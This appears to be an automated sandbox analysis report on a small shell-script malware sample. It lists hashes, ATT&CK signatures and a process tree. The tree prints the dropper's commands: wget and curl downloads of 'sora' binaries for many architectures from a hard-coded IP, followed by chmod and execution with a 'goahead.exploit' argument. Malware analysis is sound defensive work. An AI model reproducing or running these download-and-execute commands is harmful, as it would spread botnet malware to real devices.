Analysis
-
max time kernel
14s -
max time network
15s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
18/10/2024, 02:43
Static task
static1
Behavioral task
behavioral1
Sample
c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh
-
Size
2KB
-
MD5
ee0d49be644dae49f775256609f1218e
-
SHA1
036f36cd4a7dc0abe7ea6315e9f2524f35a6c73d
-
SHA256
c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2
-
SHA512
1df66cf2794390f84d3c0e20e24991c720c852c38a3b1984e8c120d1310f492ffad43ae4248e72cbd00968ec4a3db753f4a748147ac2295ad7a83f46146374c8
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 686 chmod 711 chmod 724 chmod 822 chmod 672 chmod 693 chmod 699 chmod 784 chmod 751 chmod 774 chmod 816 chmod 739 chmod 829 chmod 835 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 673 robben /tmp/robben 687 robben /tmp/robben 694 robben /tmp/robben 700 robben /tmp/robben 712 robben /tmp/robben 726 robben /tmp/robben 740 robben /tmp/robben 752 robben /tmp/robben 775 robben /tmp/robben 785 robben /tmp/robben 817 robben /tmp/robben 823 robben /tmp/robben 830 robben /tmp/robben 836 robben -
Checks CPU configuration 1 TTPs 14 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 676 wget 680 curl 685 cat -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/robben c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh
Processes
-
/tmp/c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh/tmp/c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh1⤵
- Writes file to tmp directory
PID:649 -
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x862⤵PID:651
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x862⤵
- Checks CPU configuration
- Reads runtime system information
PID:660
-
-
/bin/catcat sora.x862⤵PID:670
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-pjE5rl2⤵
- File and Directory Permissions Modification
PID:672
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:673
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:676
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
PID:680
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:685
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-pjE5rl2⤵
- File and Directory Permissions Modification
PID:686
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:687
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x86_642⤵PID:689
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x86_642⤵
- Checks CPU configuration
- Reads runtime system information
PID:691
-
-
/bin/catcat sora.x86_642⤵PID:692
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-pjE5rl2⤵
- File and Directory Permissions Modification
PID:693
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:694
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i4682⤵PID:696
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i4682⤵
- Checks CPU configuration
- Reads runtime system information
PID:697
-
-
/bin/catcat sora.i4682⤵PID:698
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-pjE5rl2⤵
- File and Directory Permissions Modification
PID:699
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:700
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i6862⤵PID:702
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i6862⤵
- Checks CPU configuration
- Reads runtime system information
PID:706
-
-
/bin/catcat sora.i6862⤵PID:710
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-pjE5rl2⤵
- File and Directory Permissions Modification
PID:711
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:712
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mpsl2⤵PID:715
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
PID:719
-
-
/bin/catcat sora.mpsl2⤵PID:723
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-pjE5rl2⤵
- File and Directory Permissions Modification
PID:724
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:726
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm42⤵PID:728
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm42⤵
- Checks CPU configuration
- Reads runtime system information
PID:732
-
-
/bin/catcat sora.arm42⤵PID:737
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-pjE5rl2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:740
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm52⤵PID:743
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm52⤵
- Checks CPU configuration
- Reads runtime system information
PID:746
-
-
/bin/catcat sora.arm52⤵PID:750
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-pjE5rl2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:752
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm62⤵PID:755
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm62⤵
- Checks CPU configuration
- Reads runtime system information
PID:772
-
-
/bin/catcat sora.arm62⤵PID:773
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-pjE5rl2⤵
- File and Directory Permissions Modification
PID:774
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:775
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm72⤵PID:777
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm72⤵
- Checks CPU configuration
- Reads runtime system information
PID:778
-
-
/bin/catcat sora.arm72⤵PID:782
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-pjE5rl2⤵
- File and Directory Permissions Modification
PID:784
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:785
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc2⤵PID:787
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
PID:791
-
-
/bin/catcat sora.ppc2⤵PID:815
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-pjE5rl2⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:817
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc440fp2⤵PID:819
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc440fp2⤵
- Checks CPU configuration
- Reads runtime system information
PID:820
-
-
/bin/catcat sora.ppc440fp2⤵PID:821
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-pjE5rl2⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:823
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.m68k2⤵PID:826
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
PID:827
-
-
/bin/catcat sora.m68k2⤵PID:828
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-pjE5rl2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:830
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.sh42⤵PID:832
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.sh42⤵
- Checks CPU configuration
- Reads runtime system information
PID:833
-
-
/bin/catcat sora.sh42⤵PID:834
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-pjE5rl2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:836
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1